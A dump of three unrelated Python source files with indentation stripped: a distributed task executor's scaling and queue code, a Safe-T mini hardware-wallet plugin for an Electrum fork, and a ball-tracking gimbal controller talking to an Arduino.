self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.suppress_failure = suppress_failure
self.run_dir = '.'
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-c {cores_per_worker} "
"--task_url={task_url} "
"--result_url={result_url} "
"--logdir={logdir} "
"--hb_period={heartbeat_period} "
"--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
l_cmd = self.launch_cmd.format(debug=debug_opts,
task_url=self.worker_task_url,
result_url=self.worker_result_url,
cores_per_worker=self.cores_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
logdir="{}/{}".format(self.run_dir, self.label))
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = self.provider.scaling_enabled
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._executor_bad_state = threading.Event()
self._executor_exception = None
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
if self.provider:
self.initialize_scaling()
else:
self._scaling_enabled = False
logger.debug("Starting HighThroughputExecutor with no provider")
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self._executor_bad_state.is_set():
try:
msgs = self.incoming_q.get(timeout=1)
# logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to version mismatch in interchange")
self._executor_exception, _ = deserialize_object(msg['exception'])
logger.exception("Exception: {}".format(self._executor_exception))
# Set bad state to prevent new tasks from being submitted
self._executor_bad_state.set()
# We set all current tasks to this exception to make sure that
# this is raised in the main context.
for task in self.tasks:
self.tasks[task].set_exception(self._executor_exception)
break
task_fut = self.tasks[tid]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s, _ = deserialize_object(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"logdir": "{}/{}".format(self.run_dir, self.label),
"suppress_failure": self.suppress_failure,
"heartbeat_threshold": self.heartbeat_threshold,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
)
self.queue_proc.start()
try:
(worker_task_port, worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(self.address, worker_task_port)
self.worker_result_url = "tcp://{}:{}".format(self.address, worker_result_port)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
logger.debug("Got outstanding count: {}".format(outstanding_c))
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("MANAGERS")
logger.debug("Got managers: {}".format(workers))
return workers
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if self._executor_bad_state.is_set():
raise self._executor_exception
self._task_counter += 1
task_id = self._task_counter
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
block = self.provider.submit(self.launch_cmd, 1, 1)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Raises:
NotImplementedError
"""
to_kill = self.blocks[:blocks]
if self.provider:
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = []
if self.provider:
status = self.provider.status(self.blocks)
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.warning("Attempting HighThroughputExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.warning("Finished HighThroughputExecutor shutdown attempt")
return True
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_atom.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_atom.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_atom import constants
from electrum_atom.i18n import _
from electrum_atom.plugin import BasePlugin, Device
from electrum_atom.transaction import deserialize, Transaction
from electrum_atom.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_atom.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
old_main.py
|
"""
Author: Param Deshpande
Date created: Mon 27 Apr 18:11:03 IST 2020
Description:
Main jetson/pc python file for controlling gimbal via the tracked object.
License :
------------------------------------------------------------
"THE BEERWARE LICENSE" (Revision 42):
Param Deshpande wrote this code. As long as you retain this
notice, you can do whatever you want with this stuff. If we
meet someday, and you think this stuff is worth it, you can
buy me a beer in return.
------------------------------------------------------------
date modified: Mon 27 Apr 18:11:03 IST 2020
"""
#import gimbalcmd
if __name__ == '__main__':
import concurrent.futures
import logging
import queue
import random
import threading
import serial
import time
#import ball_tracking
import cv2
import ComArduino2 as stcom
import greenBallTracker as GBT
#import
""" WRITE YOUR VARIABLES HERE """
NO_OF_PTS = 3
CHANGE_YAW_THOLD = 2
CHANGE_PITCH_THOLD = 2
THRES_PERCENT_CHANGE =0.10
VID_SRC = 2
FRAME_CX = 460/2
FRAME_CY = 639/2
PIX_PER_DEG = 18.0
PIX_PER_DEG_VAR = 1.3
MAX_NO_FRAMES = 10
ACK_MCU_MSG = '1'
# need not change these vars.
MAX_DEL_YAW = FRAME_CX/(PIX_PER_DEG+PIX_PER_DEG_VAR)
MAX_DEL_PITCH = FRAME_CY/(PIX_PER_DEG+PIX_PER_DEG_VAR)
# should be equal to t_grab / t_tick_mcu
imageQ = queue.Queue(maxsize=10000)
commQ = queue.Queue(maxsize=30000)
""" WRITE YOUR FUNCTIONS HERE """
def trajectoryGen(centerXY, newXY, numpts = NO_OF_PTS):
"""
(tup size2, tup size2, int) -> (list of 3 ints list)
Description:generates trajectory for delta gimbal <s,
"""
trajList = []
# make sure to negate the vals as axis / coords are inverted wtro gimbal.
delYaw = -(newXY[0] - centerXY[0])/(PIX_PER_DEG+PIX_PER_DEG_VAR)
delPitch = -(newXY[1] - centerXY[1])/(PIX_PER_DEG+PIX_PER_DEG_VAR)
# if less than min of (th% of max <s change or default).
# if less than min of (th% of max <s change or default).
if(abs(delYaw) < min(CHANGE_YAW_THOLD,THRES_PERCENT_CHANGE*MAX_DEL_YAW)):
delYaw = 0
if(abs(delPitch) < min(CHANGE_PITCH_THOLD,THRES_PERCENT_CHANGE*MAX_DEL_PITCH)):
delPitch = 0
# S1 linearly diving pts from 0 to del<s as roll pitch yaw
if((newXY[0] is not -1) and (newXY[1] is not -1)):
#if delYaw , delPitch greater than angle threshold.
for i in range(numpts):
trajList.append([0, i*delPitch/(numpts-1), i*delYaw/(numpts-1)])
# if no obj detected.
else:
for i in range(numpts):
trajList.append([0, 0, 0])
return trajList
#def ...:
# """
# () -> ()
# Description:
# >>>
#
# """
def grabber_thread(event, source = VID_SRC, imgQ = imageQ):
"""
(int, queue) -> NoneType
Description : Grabs the image and puts it into the imageQ buffer.
"""
cap = cv2.VideoCapture(source)
time.sleep(3.0)
grabberLock = threading.Lock()
imgQ_size = imgQ.qsize()
while not event.is_set():
start_time = time.time() # start time of the loop
imgQ_size = imgQ.qsize()
logging.info(" no of frames" + str(imgQ_size))
grabbed, frame = cap.read()
# to make sure the buffer does not lag as real time as possible.
if(imgQ_size < MAX_NO_FRAMES):
with grabberLock:
pass
imgQ.put(frame)
#logging.info("frame grab runtime" + str(time.time() - start_time))
logging.info("FPS frame grab: " + str(1.0 / (time.time() - start_time))) # FPS = 1 / time to process loop
cap.stop()
cap.release()
#def show_frame(frame, event):
# while not event.is_set():
def process_thread(event, source = VID_SRC, trajQ = commQ, imgQ = imageQ):
"""
@brief : pops imgQ process img and calc gimb trajectory and sets the event.
"""
objA = 0
objCX = 0
objCY = 0
old_objA = 0
old_objCX = 0
old_objCY = 0
processLock = threading.Lock()
trajList = []
while(1):
if not imgQ.empty():
start_time_proc = time.time()
frame = imgQ.get()
#logging.info(" no of process frames" + str(imgQ.qsize()))
if (source is not 0):
frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)
old_objA, old_objCX, old_objCY = objA, objCX, objCY
objA, objCX, objCY = GBT.trackGreenBall(frame)
logging.info(str(objA) + " " +str(objCX) + " " +str(objCY))
with processLock:
pass
trajList = trajectoryGen((FRAME_CX, FRAME_CY), (objCX, objCY))
trajQ.put(trajList)
#logging.info("size of commsQ" + str(trajQ.qsize()))
cv2.imshow("Process Frame", frame)
if cv2.waitKey(1) == ord("q"):
event.set()
cv2.destroyAllWindows()
break
#logging.info("runtime process : " + str( (time.time() - start_time_proc))) # FPS = 1 / time to process loop
logging.info("FPS process : " + str(1.0 / (time.time() - start_time_proc))) # FPS = 1 / time to process loop
#cv2.destroyAllWindows()
#"""
# We are sending roll. pitch, yaw to the MCU.
def comms_thread(event,trajQ = commQ):
"""
(list) -> (NoneType)
Description: Sends gimbal traj to mcu and waits for ack.
>>>
"""
ptTrajList = []
dataRecvd = ''
while not event.is_set() :
# if there is a new list of trajectory in the Queue.
if trajQ.qsize() > 0.0:
start_time_comms = time.time()
ptTrajList = trajQ.get()
logging.info("trajQ size after "+str(trajQ.qsize()))
## start sending vals one by one and wait for ack by mcu.
for i in range(len(ptTrajList)):
gimbal_coords_buffer = []
gimbal_coords_buffer.append("<"+str(ptTrajList[i][0])+', '+str(ptTrajList[i][1])+', '+str(ptTrajList[i][2])+">")
teststr = gimbal_coords_buffer[0]
logging.info(teststr)
stcom.sendToArduino(teststr.encode('utf-8'))
while(dataRecvd != ACK_MCU_MSG):
dataRecvd = stcom.recvFromArduino()
#stcom.runTest(gimbal_coords_buffer)
time.sleep(0.02) #10ms for receive from stm.
#time.sleep(0.05) #5ms for receive from stm.
#logging.info("comms runtime " + str(time.time() - start_time_comms) )
logging.info("FPS comms : " + str(1.0 / (time.time() - start_time_comms))) # FPS = 1 / time to process loop
""" START YOUR CODE HERE """
if __name__ == '__main__':
pass
print
print
event = threading.Event()
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Waiting for arduino.")
stcom.waitForArduino()
logging.info("Arduino ready.")
#grab_th = threading.Thread(target = grabber_thread())
#proc_th = threading.Thread(target = process_thread())
#proc_th.start()
#grab_th.start()
# Takes care of joining, threads, ie main wont after this until all threads are finished.
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
executor.submit(process_thread, event)
executor.submit(grabber_thread, event)
executor.submit(comms_thread, event)
# useless cause of threadpoolExec
time.sleep(7)
event.set()
# executor.submit(f2)
#time.sleep(5.0)
#event.set()
# waits until I receive a message Arduino ready from arduino setup part.
# Obcomp should be ready first follwed by the duino.
#print("waiting for arduino response.")
#ComArduino2.waitForArduino()
#print("stm read successfully. LED should be blinking.")
# creating an empty buffer list.
#gimbal_coords_buffer = []
#gimbal_coords_buffer.append("<100,200,0.2>")
#gimbal_coords_buffer.append("<101,200,0.2>")
#gimbal_coords_buffer.append("<102,200,0.2>")
#gimbal_coords_buffer.append("<103,200,0.2>")
#gimbal_coords_buffer.append("<104,200,0.2>")
#ComArduino2.runTest(gimbal_coords_buffer)
#while (1):
# if cv2.waitKey(1) == ord("q"):
# event.set()
# cv2.destroyAllWindows()
# ball_tracking.live_tracking()
#key = cv2.waitKey(1) & 0xFF
#if key == ord("q"):
# break
#ball_tracking.vs.stop()
#cv2.destroyAllWindows()
#import doctest
#doctest.testmod()
""" END OF FILE """
|
async_checkpoint.py
|
